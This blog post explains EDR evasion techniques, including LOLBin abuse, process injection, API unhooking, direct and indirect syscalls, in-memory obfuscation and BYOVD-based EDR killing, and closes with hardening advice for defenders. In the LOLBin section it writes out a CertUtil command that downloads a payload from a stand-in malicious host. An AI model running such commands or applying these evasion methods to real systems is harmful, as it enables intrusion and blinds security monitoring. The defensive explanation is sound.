Endpoint Detection and Response (EDR) solutions are the cyber sentinels on our endpoints — vigilant guards that monitor system behavior, ready to pounce on anything malicious. Yet attackers are a crafty bunch. Over the past few years, they’ve developed an array of stealthy tricks to bypass, blind, or confuse EDRs, effectively playing a high-tech game of hide-and-seek with defenders. In this post, we’ll explore how attackers ghost past EDR defenses. We’ll start with a brief overview of major evasion categories (perfect for a quick read by IT managers), then dive deep into the technical rabbit hole of each evasion technique. Along the way, we’ll mention real-world tools, malware, and threat actor tactics. Finally, we’ll discuss how organizations can harden their systems and improve detection to stay ahead in this cat-and-mouse game.
Living off the Land (LOLBins): Attackers often misuse legitimate system tools — dubbed LOLBins — to perform malicious actions. By using trusted programs like PowerShell, WMI, rundll32.exe, or CertUtil.exe, they blend into normal system activity and avoid raising red flags. It’s like an intruder using the building’s own service elevator instead of breaking a window – much harder to spot.
Code Injection and Process Hollowing: Why run a malicious program in the open when you can hide it inside a legitimate process? Attackers inject their code into common processes (think explorer.exe or svchost.exe) so that EDR sees only the innocent host process running. Variants include process hollowing (starting a legit process then replacing its insides with malware) and other skullduggery to make malicious threads look like they belong.
User-Mode Hook Bypass (Unhooking & Direct Syscalls): EDRs often hook key Windows API functions to monitor suspicious calls. Attackers counter this by unhooking those functions or bypassing them. They’ll restore the original bytes of hooked functions — erasing the EDR’s “tap” on that function — to nullify the EDR’s visibility and slip their calls through unnoticed. Others avoid calling hooked APIs altogether, instead invoking system calls directly or via “indirect syscalls” to evade user-land hooks. In short, they outmaneuver the EDR’s watcher, making their activity effectively invisible to that mechanism.
In-Memory Evasion and Obfuscation: Modern malware often runs filelessly — loaded directly in memory — and uses obfuscation and encryption to hide its code. This means less evidence on disk for EDR to scan. Attackers encrypt or pack their payloads and only decrypt them in memory at the last moment. Some malware even stays encrypted during idle periods (e.g. Cobalt Strike’s beacon can “sleep” in an obfuscated state) to avoid memory scans. Additionally, copious use of junk code, scrambled strings, and other smoke-and-mirrors techniques make it hard for an EDR to recognize malicious code patterns.
EDR Tampering and Disabling (Going for the Jugular): If all else fails, attackers may try to disable the EDR itself. With sufficient privileges, they might unload or kill EDR processes, often by exploiting vulnerable drivers or OS mechanisms. In recent years, the “Bring Your Own Vulnerable Driver” (BYOVD) trick has emerged: attackers install a legitimately signed but flawed driver and exploit it to get kernel-level powers, then terminate or cripple the EDR from that high ground. There have even been “EDR killer” tools in the wild (yes, that’s as direct as it sounds) used by ransomware groups to knock out endpoint protection and clear the way for payloads.
Those are the high-level themes. Now, let’s break out the cloak-and-dagger toolkit and examine each category in depth — including examples from the real world and what makes these tricks tick.
One of the strategies attackers use is “living off the land”, which means abusing the legitimate, built-in tools of the operating system to do their bidding. Why craft a custom malware tool for, say, downloading a file or launching a script when Windows will happily do it for you with a trusted binary? By using these Living Off the Land Binaries (LOLBins), attackers hide under the guise of normal activity.
EDR systems certainly can flag misuse of legitimate tools, but it’s challenging. These binaries (signed by Microsoft and part of the OS) are usually whitelisted or at least not outright blocked. If an EDR sees powershell.exe running, it can’t just panic – admins and apps use PowerShell for all sorts of benign tasks. Similarly, wmic.exe might be executing a WMI query, or rundll32.exe might be loading a necessary DLL. Attackers exploit this trust. They run their malicious commands or scripts through these trusted hosts, making the malicious behavior look like everyday administration.
Example: Instead of using a custom downloader, an attacker might run: CertUtil.exe -urlcache -split -f http://malicious.site/payload.exe C:\Temp\payload.exe. To the uninformed eye (or a naive security filter), it’s just CertUtil doing certificate-ish things. In reality, it’s downloading malware. Many EDRs now monitor for CertUtil usage in this manner – it’s a well-known LOLBin for file download – but new or lesser-known LOLBins are discovered regularly. It’s a perpetual cat-and-mouse game: defenders plug one hole, attackers find another trusted tool with “unexpected functionality”.
Attackers have abused an array of LOLBins: PowerShell (for executing encoded malicious scripts in memory), WMI (wmic for execution and persistence), MSHTA (running malicious HTML/JS), Rundll32 (launching malicious code or scripts via DLLs), Regsvr32, InstallUtil, MSBuild, and more. Even system utilities for lol (no pun intended) like msiexec or bitsadmin have been weaponized. The LOLBas project catalogs dozens of such binaries. By using them, malware like APT backdoors and commodity loaders alike have achieved stealth, blending into the normal operations of a Windows machine.
- APT29 and Others: Many nation-state actors love LOLBins for stealth. For instance, some campaigns by APT29 reportedly leveraged WMI and PowerShell extensively to execute payloads without touching disk, knowing that these utilities are less likely to be blocked. They essentially script their implants via these native tools, leaving very little custom code for an EDR to latch onto.
- TrickBot & Emotet: These now-infamous malware families (before their disruptions) often used PowerShell or WMI in their infection chains. For example, a phishing document might spawn a hidden PowerShell to pull down the next stage. Since PowerShell is a legitimate admin tool, older security solutions sometimes missed the malicious context. Modern EDRs attempt to inspect the commands passed to PowerShell for malicious content, but attackers respond with heavy obfuscation (PowerShell can encode commands or split them into pieces to confuse detectors).
- Cobalt Strike and C2 frameworks: Post-exploitation toolkits like Cobalt Strike’s Beacon or the open-source Sliver often let operators execute via LOLBins. They have features to run shell commands or spawn processes, so a skillful operator might use rundll32 or regsvr32 to launch malicious code in a way that looks like a benign admin action. The Deimos C2 (an open-source Go-based C2) was demonstrated using LOLBins to drop its agent, highlighting how red teamers (and by extension real attackers) mix these techniques into their playbook.
From an EDR perspective, detecting LOLBin abuse is all about behavioral context. If powershell.exe suddenly starts encoding a huge base64 blob on the command line, or rundll32.exe starts reaching out to the internet, alarms should ring. Leading EDRs apply behavioral analytics and rules: for example, “alert if MSHTA spawns a child process that is abnormal” or “flag any use of CertUtil.exe writing to disk from a URL.” Still, it’s a delicate balance – you don’t want a false positive every time an admin runs a script. Attackers know this and try to make their LOLBin usage blend in, sometimes timing it with normal activity or naming their files and servers to look legitimate.
The key point: LOLBins let attackers ride on the trust of Windows components. It’s literally hiding in plain sight, using Windows to attack itself. As we’ll discuss later, defending against this requires tight monitoring of how these binaries are used, not just whether they’re used at all.
Why run your malicious code as a separate process (where an EDR might notice a weird new program) when you can inject it into an existing, reputable process? This is the logic behind code injection techniques. The concept has been around for ages, but it remains a staple of EDR evasion in modern attacks. By executing code under the guise of a trusted process, attackers make it much harder for defenders to distinguish malicious threads from normal ones.
Remote Code Injection: The classic variant is when malware uses Windows API calls like OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread to write payload code into another process’s memory and run it. For example, malware might inject into explorer.exe (since it’s always running) or into a browser process, then do evil stuff from there. To the EDR’s telemetry, it looks like Explorer suddenly started making network connections or modifying the registry – which might be less suspicious than a random EXE doing it. It’s basically malware wearing the skin of a trusted process.
Process Hollowing: This sub-technique involves starting a new process in a suspended state (often a benign system binary like svchost.exe or notepad.exe), then replacing its memory with malicious code before resuming it. The result: an innocuous process name in the system (maybe Notepad), but all of its code is the attacker’s payload. From the outside, it looks like Notepad is running (perhaps shrugging off why Notepad needs network access or admin rights).
DLL Injection and Reflective Loading: Attackers may also inject by forcing a process to load a malicious DLL. This can be done via adding registry entries (for persistence/injection via AppCertDlls, etc.) or simply using CreateRemoteThread in a target process to call LoadLibrary on a DLL path. A more advanced version is reflective DLL loading, where the DLL code is loaded from memory without ever touching disk – making it “fileless.” Frameworks like PowerShell Empire and Cobalt Strike have long used reflective loaders to avoid dropping files that EDR scanners might catch.
APC Injection and Thread Hijacking: There are exotic techniques like Queue User APC (Asynchronous Procedure Call) injection, where malware queues malicious code to run in the context of another process’s thread (often at a point when the thread enters an alertable state). Or thread hijacking, where an existing thread in a process is paused and its instruction pointer redirected to malicious code (so no new thread appears; an existing one just goes rogue). These techniques are attempts to be even sneakier — injecting code without the straightforward “create remote thread” that EDRs more easily detect.
Process Doppelgänging and Herpaderping: With names seemingly taken from a fantasy novel, these are modern evasion methods that manipulate how Windows spawns processes to confuse security scanners. Process Doppelgänging (discovered around 2017) abuses the Windows Transactional File System to create a process from a tampered file in such a way that the file looks legit on disk, but the process runs malicious code that was never committed to disk — bypassing some AV/EDR file scans. Process Herpaderping (2020) similarly obscures the executable’s true content by messing with how the image is mapped or modified at runtime, so the security products see one thing while the OS executes another. These are advanced techniques and not as widespread, but they show the constant innovation in injection tactics to stay a step ahead of defenses.
It’s safe to say most serious malware in the last decade employs some form of injection. For instance, banking trojans like QakBot or IcedID commonly inject into browser processes or other system processes after they get on a machine — partly to hide, partly to access data in those processes (like your banking website in a browser). The notorious TrickBot trojan similarly would inject into system processes to conceal its theft of credentials and movement in the system.
On the post-exploitation side, Cobalt Strike Beacon is injection-happy by design. Red teamers and attackers using Cobalt Strike will often start with a Beacon in memory (as shellcode), then migrate that Beacon into a safer home — e.g. injecting into dllhost.exeor some Windows service process – using Cobalt Strike’s built-in migrate command. The open-source Sliver C2 works the same way: its documentation shows using the migrate feature to move the implant into another process for evasion. By hiding the implant inside svchost or another ubiquitous process, the malware hopes the EDR will have a harder time figuring out the good from the bad threads.
Another example is Meterpreter (the Metasploit Framework’s payload), which by default injects itself into memory of processes to run. Ransomware often injects code into processes like lsass.exe (to dump credentials) or into legitimate system processes to disable things. Basically, if you look at the MITRE ATT&CK technique for Process Injection (T1055), there’s an entire family of sub-techniques and nearly every major threat actor or malware has used one or more of them.
EDRs are quite aware of injection patterns. Basic indicators include: a process opening another process handle with certain access rights, memory being allocated and written to in another process, a thread creation in a process that’s initiated from an external source, etc. Many EDRs will alert if, say, winword.exe (Microsoft Word) spawns a remote thread in svchost.exe – that’s definitely unusual.
However, attackers have counters: some use direct syscalls (which we’ll discuss next) to perform the injection steps, avoiding the high-level Windows APIs that EDR hooks. Others attempt “stack spoofing” or using call hooking to hide the origin of the injection. An interesting detection EDRs now use is checking for threads that start in suspicious memory regions. Normally, a thread in a process starts at a legitimate code section of a loaded module (backed by an EXE or DLL on disk). If an EDR finds a thread whose start address is in a heap or allocated memory (not tied to any module), that’s a red flag — likely injected code. This method is quite effective and used with high confidence by some EDRs. In response, Cobalt Strike’s latest version (4.11+) actually introduced a new “thread stack spoofing” injection technique as the default, specifically to make injected threads look more legitimate and defeat this detection. It’s an arms race: defenders came up with a great way to catch injected threads, so the attackers (or red team tool developers) found a way to mask the thread start location by leveraging existing code gadgets.
One could say, process injection is the art of hiding a wolf in sheep’s clothing. It remains extremely prevalent. EDRs use advanced heuristics to catch it, but skilled attackers continuously refine their methods to blend malicious threads into the crowd of normal execution. It’s a spy vs. spy scenario happening at the memory level of your endpoints.
Modern EDRs do a lot of their magic by monitoring API calls that programs make. They often achieve this via user-mode function hooking — patching key functions (usually in ntdll.dll or other core libraries) to intercept calls like process creation, file writes, network connections, etc., and then deciding if it looks malicious. Think of it as the EDR placing tripwires on all the interesting doors and windows (APIs) that a program might use to do bad things. Naturally, attackers have figured out how to step over or disable those tripwires. Here’s how they do it.
One approach malware uses is to remove the hooks altogether. Since the hooks are just code modifications in the process’s memory, advanced malware can identify those hooks and overwrite them with the original, benign bytes, effectively restoring the original function. This is typically called API unhooking or module stomping. By doing so, the malware nullifies the EDR’s visibility on that function call. For example, if an EDR hooked NtAllocateVirtualMemory (to watch for, say, malware allocating RWX memory), the malware can copy a clean version of ntdll.dll from disk and patch its in-memory NtAllocateVirtualMemory bytes back to the clean state, erasing the hook. Now, when it calls that function, it goes straight to the real deal without the EDR’s injected jump, evading the monitor.
This sounds like a silver bullet, but EDRs aren’t blind to unhooking. Some will periodically verify that their hooks are intact and, if they detect tampering, will re-hook or even terminate the process. (Imagine the guard sees someone disarm the security camera, so he sounds the alarm or fixes it.) Nonetheless, malware has been found doing widespread unhooking. In 2023, a threat group dubbed BlueBravo was observed using a tool (“GraphicalNeutrino”) that unhooked all API hooks in ntdll and wininet modules before proceeding with its payload, precisely to blind the EDR. Red team tools like ScareCrow (an EDR bypass framework) also implement this: ScareCrow will load fresh copies of system DLLs and remove EDR hooks by overwriting the hooked functions with the original bytes, then proceed to run its shellcode without tripping the wires.
Another unhooking trick is manual DLL mapping: the malware doesn’t even bother altering the existing ntdll.dll; instead it loads a second copy of ntdll into memory at a different location (without using Windows’ normal LoadLibrary, to avoid detection). Then it calls all its APIs through this clean copy of the DLL, which the EDR didn’t get a chance to hook. This way, the hooked copy is ignored entirely. The downside is that having two copies of the same DLL in one process is a bit odd and can itself be a giveaway if an EDR is doing a thorough memory scan. But some malware does this for critical functions to stay under the radar.
Even more popular in recent years is the use of direct system calls. Normally, when a program wants to do something kernel-level (like allocate memory, create a process, etc.), it calls a function in ntdll.dll which then invokes a special CPU instruction (syscall) to transition to kernel mode. EDRs place hooks in those ntdll functions. So, attackers say: “Why not skip ntdll entirely and execute the syscall instruction ourselves?” By hardcoding or dynamically obtaining the System Service Number (SSN) for the desired system call, malware can issue the syscall directly from its own code, completely bypassing any hooked API. This is like finding a hidden backdoor straight into the kernel, so you don’t have to go through the front door that’s guarded. Tools like SysWhispers have automated generating code for direct syscalls, and many implants (including Cobalt Strike via its Beacon Object Files and others) have adopted this technique.
However, EDRs caught on. Such “manual” syscalls are a strong indicator of malicious activity, because normal applications almost never do that (Windows APIs handle it for them). Sophisticated EDRs began watching for calls into the kernel that didn’t originate from ntdll. They can do this by examining the call stack when a system call happens – if the stack doesn’t show the legitimate DLL, it’s suspicious. In fact, some EDRs will log or block outright any syscall that comes from an unexpected memory region. So direct syscalls, while initially a superb bypass, became less foolproof as EDRs adapted.
Enter indirect syscalls — a clever refinement. Attackers noted that EDR hooks often patch only the beginning of the target function but leave the actual syscall instruction in place down the function body. For instance, a hooked NtReadFile might start with a jump to EDR code, but later in the function it still has the real syscall. Indirect syscall technique means the malware jumps *into the legitimate DLL function * *after the hook – right at the syscall instruction – after setting up the correct registers (particularly the SSN in EAX). In effect, the code uses the OS’s own syscall mechanism but without ever invoking the EDR’s patched entry. The EDR sees a syscall coming from ntdll code*, which looks perfectly normal, except the call stack may be a tad shorter than usual. This was less noisy than manual syscalls.
Malware like Pikabot (a newer banking trojan) has been observed employing indirect syscalls to great effect. Pikabot actually goes further by also heavily obscuring its code flow, but the takeaway is that it “speaks” to Windows kernel in a covert way. As VMRay’s analysis put it, indirect syscalls are a “significant evolution in malware evasion” that complicate detection. Another variant uses a technique fancifully called “Halo’s Gate” (no relation to Bungie’s Halo game…) which finds unhooked system call stubs in ntdll by searching for nearby function opcodes. All these methods aim to do the forbidden actions (allocate memory, spawn processes, etc.) without tripping the user-mode hooks.
One more method to mention is hook detection: Some malware first checks if functions are hooked (by looking for the jump opcode at the start of APIs or other inconsistencies). If hooks are found, the malware might choose a different path — for example, not execute, or attempt an unhook — or use an entirely different set of APIs that it knows aren’t hooked. This is more of a reconnaissance tactic, but it underscores how malware can sense the EDR’s presence. Pikabot, for instance, inspects certain API prologues in memory for signs of hooking. If it finds the telltale JMP from an EDR hook, it knows it’s being watched and adjusts accordingly.
On the offensive tooling side, many implants incorporate these ideas. Cobalt Strike’s Beacon can be configured to use direct/indirect syscalls in its stagers, and recent updates focus on getting around EDR hooks. Brute Ratel, a newer commercial post-exploitation kit, specifically advertises EDR-evasion and likely uses similar techniques under the hood (reports indicate it can perform API calls without detection, suggesting syscall-level tricks). We mentioned ScareCrow earlier — it not only unhooks but also uses its own “syscall-esque” methods to execute shellcode once the hooks are removed. Open-source projects like TitanHide have also experimented with disabling or bypassing userland hooks (TitanHide was more for anti-debugging, but conceptually related).
From the malware/APT side: We saw the BlueBravo APT unhooking in 2023. The Lazarus Group (North Korean APT) in some of their malware have included direct syscall usage and even custom Windows syscalls (trying to fly under the radar of known APIs). Some of their documented tools show checks for EDR hooks and memory patching. Even certain ransomware strains now adopt these techniques for the critical parts of their workflow (like terminating processes or deleting backups) to avoid being blocked.
EDRs, for their part, didn’t just roll over. Aside from call stack inspection for direct syscalls, some moved more of their monitoring into the kernel (where the malware can’t tamper easily). If the EDR can see that any syscalls are being invoked to, say, create a remote thread or allocate RWX memory, it can still respond even if its user-mode component was bypassed. Some EDRs leverage Kernel Callback routines or Event Tracing (ETW) to catch things like process creation, image loading, etc., which can supplement or replace user hooks. There’s also a move toward hardware-based enforcement — for instance, Intel CET (Control-Flow Enforcement) can thwart some of the hook-skipping or return-oriented tricks by preventing unintended control flow, though that’s a broader protection.
Nonetheless, hooking evasion is a game of move-countermove. Today it’s direct and indirect syscalls; if those get too risky, attackers might find yet another pathway. (Some research talks about “syscall proxies” or doing work in trusted processes via hijacking, etc.) The lesson is that user-mode hooks, while useful, can never be fully relied on in the face of a determined adversary — because anything running in user-mode can potentially be seen or altered by the malware itself. Attackers love to remind us: If it’s your code versus mine in the same ring, I can find you and muck things up. EDR developers are thus increasingly focusing on tamper-resistant techniques and layering detection beyond just hooking.
This category is a bit of a grab-bag, but the unifying theme is hiding malicious code from prying eyes, especially by keeping it in memory and making it hard to recognize. As EDRs improved file scanning and reputation checks, attackers shifted heavily toward memory-only or fileless techniques, and toward making their code as confusing as possible to analyze. Think of it like writing a secret message in invisible ink — the content is there, but you need the right reagent (or in our case, decoding) to reveal it. Meanwhile, if anyone glances over it quickly (like an automated scanner), they see nothing intelligible.
Traditional antivirus used to heavily focus on files: if a malicious EXE is on disk, scan it and catch it. EDRs still pay attention to files, but also monitor processes at runtime. To reduce the chance of detection, many modern attacks try to avoid writing their payloads to disk entirely. Instead, they might use a small loader (which could be a script or a macro or one of those LOLBins) to load the real payload directly into memory. For example, a phishing document might execute a PowerShell command that downloads an encrypted blob and reflects it into memory as shellcode — never dropping an .exe on disk. No file means nothing for file-based scanners to quarantine, and EDRs have to catch it in action. Funny enough, sometimes the malicious code gets paged out when the physical memory runs out of space. That can lead to signature detections on the page/swap file.
Malware like Cobalt Strike Beacon, Meterpreter, Empire agents, etc., are often injected straight into memory. Even commodity malware droppers have adopted this; e.g., the Trickbot gang’s BazarLoader would reflectively load its DLL payload. Some ransomware affiliates in recent years use frameworks that inject the ransomware payload into memory from a loader script to avoid leaving samples on disk.
While EDRs do watch memory, they often have to rely on behavior (what is the code doing?) rather than simple signatures. Some advanced EDRs perform periodic memory scans looking for known malicious patterns or implants, but this is resource-intensive and not foolproof. Attackers respond by encrypting or disguising their code in memory when it’s not actively executing. A prime example: the sleeping beacon. Cobalt Strike introduced an advanced SleepMask in 2021–2022 that essentially encrypts or garbles the Beacon’s memory footprint when the beacon is in a sleep/dormant state. The moment it wakes to do an action, it quickly decrypts in memory, does its thing, and then re-encrypts itself. If an EDR memory scanner runs while the beacon is sleeping, it hopefully only sees an unintelligible blob, not the telltale patterns of known malicious code. This is essentially on-demand obfuscation in RAM, like a ninja covering his tracks in the sand after every step.
Whether on disk or in memory, malware frequently obfuscates its code and data to avoid recognition. This can involve packing (compressing/encrypting the whole file with a stub that decrypts it at runtime), inserting lots of meaningless junk instructions that do nothing (to throw off disassemblers and heuristics), or encoding strings and configuration so that IoCs are not visible in memory. For instance, a banking trojan might encrypt all its command-and-control server strings in memory and only decrypt right before use, so an EDR can’t simply scan memory for the known bad URL or key phrase.
The earlier-mentioned Pikabot is noted for extensive obfuscation: it pads its code with irrelevant junk and hides strings, making analysis difficult. Many malware creators employ commercial packers or even custom virtual machine-based obfuscators (like the infamous Turla’s PolyCrypt or commercial protectors like Themida) that transform their code into something very hard to statically analyze. While packers are an old topic, they’re still evolving — and some are specifically designed to fool EDRs by, say, chunking the execution so no single piece looks too malicious, or by hiding API calls behind opaque constructs.
In-memory evasion also includes using non-standard languages or runtimes. For example, using .NET or PowerShell in memory (with something like PowerShell’s Add-Type or Reflection.Assembly.Load to execute compiled code) can be trickier for EDRs if they don’t hook .NET runtime calls effectively. Attackers might compile malicious code into memory via scripting to bypass traditional monitoring.
A particularly sneaky trick is memory privilege abuse: some malware allocates memory in a way that EDR user-land agents might not have permission to read (e.g., using page protections or exploiting design issues to fool userland scanners). There have been proofs of concept where malicious code is kept in protected memory regions or in GPU memory to avoid CPU memory scans — though that’s more esoteric.
- Cobalt Strike & Brute Ratel: Both of these have options to encrypt and randomize their payloads in memory. Brute Ratel’s developer explicitly touted it as an EDR evasion toolkit, with malleable characteristics, likely employing heavy obfuscation and dynamic API resolving (so it doesn’t have obvious API call references in static analysis).
- Metasploit Meterpreter: It has staged payloads that are small and then pull in larger encrypted stages. Meterpreter also can reside entirely in memory; when used over an exploit, it never needs a file. It’s older and generally easier to catch now, but it set a precedent.
- APT Malware: Many state-sponsored implants (from Equation Group’s tools to more recent ones like Sliver (used by various threat actors)) are built to be stealthy in memory. APT32 (OceanLotus) had malware that unpacked in multiple stages in memory, each stage decrypted the next — so at no point was the full payload visible until the final moment of execution. And that final stage would often reside in a legitimate process context due to injection.
- Script-based Trojans: Malware like Emotet and Dridex at times used embedded PowerShell or VBA scripts that would load .NET reflective DLLs (for example, using a C# payload that is compiled and loaded on the fly). These leave very little for EDR to latch onto unless it has script scanning (like AMSI for PowerShell, which many attackers also bypass via AMSI hooking patches, a topic in itself).
It’s worth noting that EDRs with memory scanning capability have had successes in catching threats that are essentially invisible on disk. For example, certain fileless miners or in-memory webshells were caught because the EDR noticed a process making weird calls and then scanned memory to find known malicious code fragments. The attackers’ counter to that is what we described — don’t have known fragments (encrypt them, mutate them, hide them behind layers).
Defending against obfuscation is tough — by design, it’s meant to confuse detection. Machine learning and behavioral analytics are the go-to for EDR here: instead of recognizing what the code is, they try to recognize what it’s doing. For instance, an EDR might not recognize a heavily obfuscated PowerShell script by signature, but it can execute it in a sandbox or instrument it to see, ah, it’s trying to inject shellcode into memory — that behavior is bad regardless of how the code is obfuscated. Microsoft’s AMSI (Antimalware Scan Interface) was introduced to help inspect script content at runtime; attackers answered by AMSI patching (in-memory disabling of AMSI). Again, move and countermove.
In-memory evasion and obfuscation is about hiding the needle by either removing the haystack or painting the needle the same color. Attackers remove files from disk (no haystack), and/or they disguise the code (paint the needle) so even if you have it, you don’t know what it is. This is one of the most persistent challenges in endpoint security — distinguishing bad from good when bad looks so much like good except for actual intent.
The most direct route to evading EDR is, bluntly, to incapacitate it. This is the “EDR tampering” or disabling approach. It’s bold and not always easy — many EDR products have self-protection — but if achieved, it’s game over for that endpoint’s defenses. Why play hide-and-seek if you can knock out the guard? In recent years, some attackers, particularly ransomware gangs, have turned to creative (and concerning) methods to do exactly this.
This technique has gained notoriety in the last 2–3 years. The idea: Windows allows drivers (kernel modules) to have near-omnipotent control, but it enforces that drivers must be signed. However, if you can find a legitimately signed driver that has a known vulnerability, you can bring it with you, load it on the target system (since it’s properly signed, Windows won’t refuse), and then exploit that vulnerability to run arbitrary code in kernel mode. From kernel land, you can kill processes or services that even an Administrator can’t normally kill — including EDR processes that might be protected or running as protected services.
The attacker essentially drags Windows’ own security model into a brawl: “You insist on a valid signature? Fine, here’s one — from 2018 with a buggy driver for a legitimate software. Now let me use that bug to do nasty things at kernel level.” There’s even a public database (LOldrivers) of such vulnerable drivers, meant for defense but equally useful for offense.
Real-world example: In 2023, an attacker known as Spyboy created an “EDR killer” toolkit named Terminator that used BYOVD. It dropped a vulnerable driver (signed by a legitimate certificate) to disk and loaded it, then via that driver issued commands to kill practically every major EDR/AV process on the system. For a few hundred dollars, this tool was sold on crime forums, and it caused a stir because it was effective — until EDR vendors scrambled to block the known drivers and techniques. Another case in mid-2024: a ransomware affiliate associated with the RansomHub group used a tool dubbed EDRKillShifter which similarly is a loader for vulnerable drivers. It specifically attempted to terminate the Sophos EDR agent by loading a buggy driver and using it to shut down Sophos’s processes. (In that instance, it failed — a testament that defenders are trying to stay ahead — but the mere attempt shows how common this is becoming.)
Even nation-state APTs have done this. The Lazarus Group was reported to use a Dell hardware driver vulnerability (the infamous case of a buggy Dell driver) to disable a target’s security software in some of their ops. And a few years back, a ransomware called RobbinHood (unrelated to the stock app) used a Gigabyte driver vulnerability to kill AV processes — one of the earlier BYOVD in ransomware.
Once an attacker has kernel privileges via a driver, not only can they kill processes, they can also straight-up unload the EDR’s kernel driver or stub out its callbacks, essentially neutering it. Some EDRs run parts of their product as “Protected Processes” (PPL) which even admin users can’t kill. But a vulnerable kernel driver doesn’t care about PPL — it can use Windows kernel APIs to terminate or suspend those processes anyway. It’s like getting a master key to the kingdom.
Not all EDR kill attempts require BYOVD, though that’s the most fashionable method. Simpler approaches include trying to stop the EDR service via net stop or changing registry keys – but modern EDRs usually have tamper protection to prevent that (requiring special privileges or a security token to stop them). Some malware has tried to patch or unload EDR user-mode DLLs from their process (if they detect it injected). For example, if an EDR’s user agent DLL is inside the malware’s process to do hooking, the malware might just call FreeLibrary on it or overwrite its code to disable it. EDR vendors counter this by marking their processes and modules as protected or watching for such events.
There have been instances of malware that abuse OS features to isolate or confuse EDRs. For example, some malware ran itself in a Hyper-V virtual machine on the host (yes, malware installing a tiny hypervisor!) so that it could execute underneath the EDR — effectively a reverse sandbox to hide its actions. That’s extreme and not common, but shows the creativity. Interestingly, Windows itself leverages a similar trick with Credential Guard, which isolates critical LSASS memory using virtualization-based security. This effectively creates a protected bubble that even powerful credential-dumping tools like Mimikatz struggle to pierce. It’s a classic example of security tools and attackers using the same playbook, but with opposite intentions. That’s extreme and not common, but shows the creativity on both sides of the battlefield.
We’ve also seen attacks on the EDR software itself in terms of exploits. An attacker might exploit a vulnerability in an EDR driver or agent to achieve code execution in kernel (similar to BYOVD, but using the EDR’s own flaws). Check Point Research in 2024 demonstrated chaining bugs in a security product’s driver to bypass its protections and gain kernel execution. While this is more about defeating the device’s protection, it underscores that EDRs, being software, can have vulnerabilities too — a savvy attacker might find an EDR bypass not by evading it, but by hacking it directly. Fortunately, no major incident of a widespread EDR exploit in the wild has been publicized in recent years (that would be quite bad), but it remains a theoretical possibility.
On the simpler end, attackers who gain admin rights might attempt to just uninstall the EDR or delete its files. Many EDRs block uninstallation without a special code or have drivers preventing deletion — but misconfigured ones or older AV products have been successfully removed by malware in the past. There’s also the tactic of changing settings: if an organization hasn’t locked down EDR settings, malware might flip some registry keys or local group policies to turn off components like script scanning, firewall, etc., making its job easier.
Ransomware Gangs: These guys have been the biggest adopters of EDR killing. When the name of the game is to encrypt everything as fast as possible, they don’t want an EDR stopping the encryption or detecting them during pre-encryption staging. Apart from BYOVD, some ransomware (like variants of Akira or LockBit affiliates) have used scripts that terminate processes/services based on a hardcoded list of names (targeting AV/EDR processes). Those scripts run with admin rights and just call the Windows TaskKill or Stop-Service on dozens of known security processes. It’s noisy but if you’re minutes away from detonating ransomware, you might not care about stealth at that point. The presence of such kill lists is an IoC in many incident response reports.
APT groups: They prefer stealth, so outright killing EDR might be too noisy for a long-term espionage op (the target SOC might notice if their EDR died suddenly). However, some APTs have used tampering in more subtle ways — for instance, temporarily suspending EDR monitoring during critical actions, or using kernel malware to filter out the EDR’s telemetry (essentially feeding it bogus info). One advanced example: the Slingshot APT in the past had a kernel module that sat beneath an AV and intercepted its requests, filtering what it saw. That’s next-level and rare. Generally, APTs might only disable EDR if it’s part of an active defense evasion during, say, a high-impact action (like deploying a wiper or something where they don’t care if they burn the house down after).
From the defender side, hardening the endpoint is key here. Microsoft introduced a driver blocklist for known bad drivers to mitigate BYOVD — but it needs to be enabled (via Memory Integrity / HVCI). Organizations should ensure that’s on, so at least the known vulnerable drivers can’t be loaded. EDRs themselves now often have a kernel mode component that can watch for rogue driver loads or critical process handles — for example, if an unsigned or unexpected driver is loaded, raise an alert, or if a user-mode process tries to kill the security service, block it. Some EDRs are running as Protected Process Light (PPL) so that even if malware is admin, it cannot easily terminate the EDR (unless they go BYOVD as we saw).
Detecting BYOVD might involve noticing a legit driver file popping up where it shouldn’t, or an unexpected service installation. It’s tricky, but threat intelligence has helped; once a tool like Spyboy’s Terminator is known, the hashes of its driver or the behavior pattern (driver named sysprep.sys in system32, for instance) can be added to detection.
Ultimately, an attacker going loud and trying to kill EDR is a scenario where, if detected in time, should trigger the highest alerts — it’s basically a big sign that says “Intruder is here, and trying to blind you!” We’ll discuss in the next section how to prepare for and respond to such moves.
We’ve toured through a lot of evasion territory — from sneaky LOLBins, to injecting malware in friendly hosts, to disarming the watchdogs themselves. You might be thinking it sounds hopeless: attackers have a whole bag of tricks! But all is not lost. In fact, knowing these techniques is the first step in defending against them. In the final section, let’s discuss how companies can harden their environments and improve detection, turning the tables on these evasions.
Attackers may be clever, but a well-prepared defender can make their life much harder. EDR evasion techniques thrive on gaps in visibility or lapses in policy. To close those gaps, consider the following defenses-in-depth to counter each category of evasion we discussed:
- Behavioral Analytics & Anomaly Detection: Since so many evasion techniques abuse legitimate tools (LOLBins) or normal processes, it’s crucial to baseline normal behavior and catch the weird stuff. For example, monitor and alert on unusual usage of admin tools — if powershell.exe starts encoding commands or mshta.exe spawns a CMD, that’s probably suspect. EDR solutions should employ behavioural analytics to detect when trusted binaries are being misused. Investing in a security analytics platform or extending your EDR’s built-in behavioral rules is key. In practice, implement rules like “Office applications spawning scripting processes” or “Command-line tools downloading from the internet” and tune them to your environment.
- Attack Surface Reduction (ASR): Not just a Microsoft buzzword — reducing what’s available for attackers to abuse can pay off big. If your users never need WMIC.exe or CertUtil.exe, consider blocking them via AppLocker or Windows Defender’s Attack Surface Reduction rules. There are ASR rules specifically to block things like suspicious behavior of PSExec/PAExec, or Office spawning child processes. By cutting off some LOLBins entirely, you force attackers to use less convenient methods (which might be noisier or easier to detect). Also disable or restrict unnecessary scripting engines where possible (e.g., WScript, cscript). The less “living off the land” available, the more an attacker has to “live off the custom”, which is easier to catch.
- Memory Integrity & Driver Control: Enable Memory Integrity / Hypervisor-Protected Code Integrity (HVCI) on capable systems to leverage the driver blocklist Microsoft maintains. This can prevent known vulnerable drivers from loading, thwarting many BYOVD attempts. Additionally, keep an eye on software that installs drivers and ensure they are up to date (vulnerable drivers often come from legitimate software that hasn’t been patched — maintain an inventory). Consider using Microsoft’s Vulnerable Driver Blocklist or 3rd-party tools that monitor driver loads. Some EDRs now will flag if an unusual driver is loaded or if a legitimate driver is being used in an odd way (e.g., dumped into an unusual directory then loaded).
